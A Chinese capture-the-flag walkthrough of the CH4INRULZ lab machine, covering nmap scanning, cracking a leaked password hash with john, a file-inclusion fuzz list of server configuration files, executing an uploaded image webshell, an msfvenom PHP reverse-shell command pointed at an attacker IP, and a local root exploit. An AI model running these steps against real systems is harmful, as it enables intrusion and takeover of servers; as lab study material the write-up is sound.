下载了镜像后查看了ip

http://192.168.16.128/

然后用nmap扫描了一波

sudo nmap -vv -sV  192.168.16.128

访问80端口发现是个个人博客

访问8081端口发现也是个站点

先搞web 然后开始用工具扫描目录

80端口扫描发现

8011端口发现api目录

访问80端口的development目录发现需要登陆

同时扫描器还扫描到了

http://192.168.16.128:80/index.html.bak

发现了frank的hash 然后利用john工具进行了破解

john hash.txt

发现密码是

frank!!!

登陆development发现

http://192.168.16.128/development/

继续访问

http://192.168.16.128/development/uploader

经过一番fuzz

t.php.aaa    5.php   5.php[1234567] 5.php%89 都不可以

都无法传成功

于是转战8011端口

http://192.168.16.128:8011/api/

挨个访问发现只有

http://192.168.16.128:8011/api/files_api.php

能访问

看他页面提示发现是缺少个参数

于是尝试给他传个参数

文件包含 or 任意文件读取

接下来的思路就是读配置文件,读日志,找网站根目录进而找到刚才传的图片马来配合

于是进行了一波fuzz

file = /etc/apache2/sites-available/default
/etc/httpd/conf/httpd.conf
/var/lib/mlocate/mlocate.db
/etc/apache2/envvars
/etc/httpd/conf/httpd.conf
/etc/my.cnf
.bash_history
/usr/local/nginx/conf/nginx.conf
/etc/httpd/conf/httpd.conf
/etc/apache2/apache2.conf
/proc/self/environ

file=//etc/apache2/sites-available/default

读到了配置信息

翻看有用的信息

另外一个web在

根据路径推断出了在80端口上传的图片

file=/var/www/development/uploader/FRANKuploads/1.jpg

出现了熟悉的画面

?剑连接

在tmp目录下上传Linux_Exploit_Suggester.pl

根据探测信息搜索exp

caidao中 执行并不会返回root的命令行

然后尝试nc反弹发现 -e参数 不能用 /bin/bash也弹不回来

然后

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.16.109  LPORT=13333 -f raw -o x.php

在tmp目录上传,然后在msf上监听

随后在tmp目录下执行

php -f "x.php"

成功反弹shell

然后执行

gcc exp.c -o exp
./exp

Cool

转载于:https://www.cnblogs.com/test404/p/10638103.html

CH4INRULZ从渗透到提权相关推荐

  1. 针对HFS 2.3漏洞进行渗透测试提权(HFS:HttpFileServer)

    利用Metasploit对HFS 2.3渗透攻击提权 针对HFS 2.3漏洞进行渗透测试提权(HFS:HttpFileServer) msf6 > search hfs Matching Mod ...

  2. 内网渗透常用提权方式总结

    文章目录 前言 内网提权的常用方法 一.Windows系统内核溢出漏洞提权 1.手动查找系统潜在漏洞 2.使用Windows-Exploit-Suggester 3.使用sherlock 脚本 4.还 ...

  3. Linux渗透与提权:技巧总结篇

    本文为Linux渗透与提权技巧总结篇,旨在收集各种Linux渗透技巧与提权版本,方便各位同学在日后的渗透测试中能够事半功倍. Linux 系统下的一些常见路径: /etc/passwd/etc/sha ...

  4. LINUX渗透与提权总结

    本文为Linux渗透与提权技巧总结篇,旨在收集各种Linux渗透技巧与提权版本,方便各位同学在日后的渗透测试中能够事半功倍. Linux 系统下的一些常见路径: 001 /etc/passwd 002 ...

  5. 渗透测试Metasploit框架体验(5.理解MSF后渗透-之提权)

    1.目标机器权限提升 权限提升(privilege escalation) : 攻击者通过安全漏洞把获取到的受限制的低权限用户突破限制,提权至高权限的管理员用户,从而获得对整个系统得控制权.Windo ...

  6. 小白日记21:kali渗透测试之提权(一)--本地提权

    本地提权 简单地说,本地提权漏洞就是说一个本来非常低权限.受限制的用户,可以提升到系统至高无上的权限.权限提升漏洞通常是一种"辅助"性质的漏洞,当黑客已经通过某种手段进入了目标机器 ...

  7. 渗透测试——提权方式总结

    (内容整理自网络) 一. 什么是提权 提权就是通过各种办法和漏洞,提高自己在服务器中的权限,以便控制全局. Windows:User >> System Linux:User >&g ...

  8. hackthebox-tabby (LFI tomcat9 渗透 lxd 提权)

    1.扫描 ssh可能有登录.80是web,8080常规是tomcat.就这几常规端口说明主要是进网页搜集信息 C:\root> nmap -A 10.10.10.194 Starting Nma ...

  9. WINDOWS渗透与提权总结(1)

    旁站路径问题: 1.读网站配置. 2.用以下VBS: 01 On Error Resume Next 02   03 If (LCase(Right(WScript.Fullname, 11)) = ...

最新文章

  1. QQ音乐的各种相关API
  2. 平板电脑桌面添加计算机快捷键,驰为Vi10教你Windows 10中的这些实用快捷键
  3. Linux学习笔记:安装python
  4. 没人性!让我们这么早来上班
  5. 信贷常用风控报表(二)
  6. 完整的安全方案需要参考的几个方面
  7. 微信小程序使用组件实现移动端软键盘
  8. 双线性映射matlab,[Matlab]双线性变换法设计数字带通滤波器
  9. linux 更改sh文件权限不够,linux权限不够,sh不能用
  10. 第七十三集 KVM虚拟化☜(゚ヮ゚☜)
  11. 电脑准考证登录不上去
  12. 问答学习系统 - 针式PKM V8.20新增功能
  13. 计算机二级办公软件的函数,《计算机二级办公软件常用excel函数》.doc
  14. 第二个MFC实例:GPA计算器
  15. Python读写串口编程
  16. 燕十八 mysql_燕十八mysql笔记
  17. 在图片上添加文字和图片
  18. Google Adwords和Adsense的区别
  19. 大数据分析考试复习资料
  20. 利用CSS和JS实现抖音超火3d照片墙

热门文章

  1. 腾讯云弹性伸缩工程优化揭秘
  2. windows系统上最后一个redis版本Redis-x64-3.0.504下载与安装配置
  3. PHP仿微信多图片预览上传
  4. ES6总结——let、const
  5. 每日学术速递2.17
  6. Ubuntu下caffe:用自己的图片训练并测试AlexNet模型
  7. mongodb gridfs java_mongodb gridfs基本使用
  8. 武汉五一自驾车出行合理选择出行时间和线路
  9. gcc 编译参数 -fPIC 作用
  10. 进计算机中级职称,怎么考试?考哪些内容?